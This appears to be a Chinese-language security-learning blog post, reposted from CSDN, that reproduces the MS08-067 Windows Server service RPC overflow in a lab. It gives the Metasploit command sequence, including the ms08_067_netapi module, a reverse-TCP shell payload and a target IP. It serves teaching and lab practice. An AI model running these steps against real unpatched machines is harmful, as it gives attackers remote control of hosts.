天天看点

「网络攻防」网络安全基础之Windows漏洞复现 (MS08-067)

前言

本次介绍Windows系统漏洞 MS08-087

一、MS08-067 介绍

Windows Server服务 RPC 缓冲区远程溢出漏洞

编号 MS08-067

二、漏洞复现

1.漏洞原理

MS08_067漏洞渗透攻击原理

其原理就是攻击者利用受害者默认开启的SMB服务端口445端口发送恶意的资料到这个端口,通过MSRPC接口调用Server服务的函数,并破坏程序的栈缓冲区,利用远程代码执行权限,从而控制主机

2.漏洞复现

前期准备: 靶机:Windows 2003 (未打补丁)

攻击机:kali Linux

MS08_067漏洞渗透攻击过程

使用Metasploit中对应的模块进行渗透攻击。

启动Metasploit,进入之后搜索对于漏洞模块

Search ms08-067

「网络攻防」网络安全基础之Windows漏洞复现 (MS08-067)

搜索到ms08-067 对于的漏洞模块,渗透模块又四部分组成 分别代表模块类型 目标平台 目标服务 模块名称 组成

2. 使用这个模块

Use exploit/windows/smb/ms08_067_netapi

「网络攻防」网络安全基础之Windows漏洞复现 (MS08-067)

3.查看所需条件

Show options

「网络攻防」网络安全基础之Windows漏洞复现 (MS08-067)

需要设置靶机的ip地址 攻击载荷 靶机的系统平台版本

4. 设置攻击载荷

攻击载荷就是payload 就是常见的shelllode

首先查找payload

Show payload

「网络攻防」网络安全基础之Windows漏洞复现 (MS08-067)

找到所需的payload

generic/shell_reverse_tcp

使用这个payload

Set payload generic/shell_reverse_tcp

「网络攻防」网络安全基础之Windows漏洞复现 (MS08-067)

5. 设置靶机的主机版本

Show targets

「网络攻防」网络安全基础之Windows漏洞复现 (MS08-067)

在前期对靶机的探测当中获得的主机版本消息,找到合适的版本信息

「网络攻防」网络安全基础之Windows漏洞复现 (MS08-067)

Automatic Targeting 选择这个系统会自动选择合适的版本攻击

6.设置IP地址等信息

Set rhost 10.10.10.130

「网络攻防」网络安全基础之Windows漏洞复现 (MS08-067)

7.运行

Run

8.得到shell

输入shell 进入shell交互式

总结

今天介绍了 Windows经典漏洞 MS08-067 漏洞攻击原理和复现过程

————————————————

版权声明:本文为CSDN博主「爱学网安的萌新」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。

原文链接:https://blog.csdn.net/weixin_60888404/article/details/125112307

继续阅读